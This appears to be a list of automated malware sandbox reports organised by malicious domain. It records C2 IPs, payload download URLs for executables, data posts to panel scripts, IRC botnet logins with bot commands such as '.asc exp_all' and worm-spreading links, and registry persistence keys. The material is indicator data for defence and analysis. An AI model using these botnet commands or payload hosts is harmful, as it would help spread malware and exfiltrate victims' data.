tiffall.com 188.65.73.165 Download URLs http://188.65.73.165/nconfirm.php?rev=295&code=3&param=0&num=18212908502016 (tiffall.com) Outgoing connection to remote server: tiffall.com TCP port 80 DNS Lookup Host Name IP Address tiffall.com tiffall.com 188.65.73.165 ridgear.com ridgear.com 76.73.68.114 Download URLs http://188.65.73.165/njob.php?num=10277514037544684544&rev=295 (tiffall.com) http://188.65.73.165/nconfirm.php?rev=295&code=7&param=0&num=18212908502016 (tiffall.com) http://188.65.73.165/nconfirm.php?rev=295&code=8&param=0&num=18212908502016 (tiffall.com) http://76.73.68.114/up/new123/netprotocol.exe (ridgear.com) Outgoing connection to remote server: tiffall.com TCP port 80 Outgoing connection to remote server: ridgear.com TCP port 80 DNS Lookup
ms4oov.twoplayers.net
ms4oov.twoplayers.net 98.126.214.82 Remote Host Port Number 112.78.112.208 80 218.85.133.201 80 98.126.214.82 6789 PASS laorosr MODE #! -ix MODE #Ma -ix USER SP2-650 * 0 :COMPUTERNAME MODE [N00_USA_XP_9718720] @ -ix MODE #dpi -ix Joins channel: :#! #! :.asc-S|.http http://208.53.183.217/use13.exe|.asc exp_all 30 5 0 -a-r -e|.asc exp_all 30 5 0 -b -r-e|.asc exp_all30 5 0 -b|.asc exp_all
mypanelftp.co.cc
mypanelftp.co.cc mypanelftp.co.cc 91.215.170.45 Opened listening TCP connection on port: 27217 Download URLs http://91.215.170.45/banner.tif (mypanelftp.co.cc) Data posted to URLs http://91.215.170.45/vorota.php (mypanelftp.co.cc) Outgoing connection to remote server: mypanelftp.co.cc TCP port 80 Outgoing connection to remote server: mypanelftp.co.cc TCP port 80 Outgoing connection to remote server: mypanelftp.co.cc TCP port 80 Outgoing connection to remote server: mypanelftp.co.cc TCP port 80
www.claudia-ferrer.com
www.claudia-ferrer.com 200.98.197.72 Download URLs http://200.98.197.72/site/javawhelper.jpg (www.claudia-ferrer.com) http://200.98.197.72/site/huntermails.jpg (www.claudia-ferrer.com) http://200.98.197.72/site/msgnlive.jpg (www.claudia-ferrer.com) Outgoing connection to remote server: www.claudia-ferrer.com TCP port 80 Outgoing connection to remote server: www.claudia-ferrer.com TCP port 80 Outgoing connection to remote server: www.claudia-ferrer.com TCP port 80 Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ECA9A748-EC22-4405-9F94-19CADCD27081} “” = HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ECA9A748-EC22-4405-9F94-19CADCD27081}\InprocServer32 “” = C:\WINDOWS\system32\javawhelper.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ECA9A748-EC22-4405-9F94-19CADCD27081}\InprocServer32 “ThreadingModel”
akgjsudim.com
akgjsudim.com 195.226.220.123 Data posted to URLs http://195.226.220.123/t0.php (akgjsudim.com) Outgoing connection to remote server: akgjsudim.com TCP port 80 Registry Changes by all processes Create or Open Changes Reads HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared “CUAS” HKEY_CURRENT_USER\Keyboard Layout\Toggle “Language Hotkey” HKEY_CURRENT_USER\Keyboard Layout\Toggle “Layout Hotkey” HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF “EnableAnchorContext” HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE “” HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Setup “IExploreLastModifiedLow” HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Setup “IExploreLastModifiedHigh” HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EAB22AC1-30C1-11CF-A7EB-0000C05BAE0B}\TypeLib “” HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B722BCCB-4E68-101B-A2BC-00AA00404770}\ProxyStubClsid32 “” HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{79EAC9C4-BAF9-11CE-8C82-00AA004BA90B}\ProxyStubClsid32 “” HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{000214E6-0000-0000-C000-000000000046}\ProxyStubClsid32
alpha1.fortalezahost.com (IM worm)
205.234.138.152:2345 Nick: NEW-[AUT|00|P|88830] Username: XP-8003 Server Pass: xxx Joined Channel: #!gf! with Password test Channel Topic for Channel #!gf!: “d http://lmysapace.net/profile.php?=” Private Message to User NEW-[AUT|00|P|88830]: “.s.p http://domredi.com/1/” Channel Topic for Channel #!gf!: “D http://facellbook.net/profile.php?=” Private Message to User NEW-[AUT|00|P|01785]: “.s.p http://domredi.com/1/”
210.170.62.115 (IM worm)
Remote Host Port Number 204.0.5.35 80 204.0.5.40 80 204.0.5.42 80 204.0.5.51 80 204.0.5.58 80 204.0.5.59 80 207.38.101.12 80 208.43.117.134 80 216.178.38.103 80 216.178.38.168 80 210.170.62.115 2345 PASS xxx NICK NEW-[USA|00|P|39876] USER XP-0115 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|39876] -ix JOIN #!gf! test PONG 22 MOTD * The data identified by the following URLs was then requested
davidserverrat.no-ip.biz
davidserverrat.no-ip.biz 70.161.219.229 Outgoing connection to remote server: davidserverrat.no-ip.biz TCP port 5555
f19dd4abb8b8bdf2.cn
us.cnn.com 157.166.255.19 f19dd4abb8b8bdf2.cn 194.0.245.66 us.cnn.com 157.166.255.18 Download URLs http://157.166.255.19/ (us.cnn.com) http://157.166.255.18/ (us.cnn.com) Outgoing connection to remote server: us.cnn.com TCP port 80 Outgoing connection to remote server: f19dd4abb8b8bdf2.cn TCP port 80 Outgoing connection to remote server: f19dd4abb8b8bdf2.cn TCP port 80 Outgoing connection to remote server: us.cnn.com TCP port 80 Outgoing connection to remote server: f19dd4abb8b8bdf2.cn TCP
prmifgfgd.dnsdojo.org (banking malware)
prmifgfgd.dnsdojo.org 222.66.209.98 222.66.209.98 UDP Connections Remote IP Address: 127.0.0.1 Port: 1049 Send Datagram: 7 packet(s) of size 1 Recv Datagram: 7 packet(s) of size 1 Download URLs http://222.66.209.98/netanalyst/images/readme.txt (222.66.209.98) Data posted to URLs http://212.189.144.121/c/job.php () Outgoing connection to remote server: 212.189.144.121 TCP port 80 Outgoing connection to remote server: 222.66.209.98 TCP port 80 Registry Changes